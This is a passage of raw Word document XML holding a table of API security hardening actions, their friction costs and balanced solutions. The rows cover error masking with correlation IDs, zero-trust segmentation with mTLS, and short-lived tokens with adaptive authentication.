                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Hardening Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6582F56D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Potential Impact / Friction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C0E3827" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The Balanced Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="40E8B226" w14:textId="77777777" w:rsidTr="00B064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9FDFA0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Centralized Error</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Masking &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Generic Responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0852D29F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Degraded Debugging:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>When production bugs occur,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>developers lose immediate</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>visibility because raw stack</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>traces are completely</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>suppressed from the UI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C66DAE7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Correlation </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>IDs:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Inject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> a unique</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>UUID into every error response</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>payload. While the user sees a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>clean, generic error page,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>developers can instantly look up the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>corresponding UUID in centralized</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>log aggregators (e.g., Datadog,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>ELK) to view the full stack trace.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6D7E7D9C" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A073ABD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Strict</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cloud/Network</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Segmentation &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Zero-Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="426543D2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Architecture Latency:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Routing API traffic through</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>deep micro-segmentation,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>multiple service meshes, or</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>enforcing continuous</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>machine-to-machine</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>validation can add minor</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>network hops (latency).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E79CFD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>High-Performance Service</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Meshes:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Optimize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> internal</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>communication using lightweight</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">protocols like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>gRPC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> rather than</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>bulky JSON/HTTP layers, and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>ensure mutual TLS (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>mTLS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) is</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>handled at the hardware or kernel</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">level via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>eBPF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7405D7C0" w14:textId="77777777" w:rsidTr="00B064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A5B280" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Short-Lived</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Tokens &amp; Session</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Expirations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77BD9078" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Poor User Experience:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Setting highly aggressive</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>session timeouts or strict</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>credential lifecycles forces</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>legitimate users to log back</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>into the platform repeatedly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E5C3FBC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Contextual &amp; Adaptive Auth:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Implement risk-based</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>authentication. Allow extended</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>session windows for trusted, known</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>user devices while forcing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>immediate re-authentication if an</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>anomaly (e.g., a geographical</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
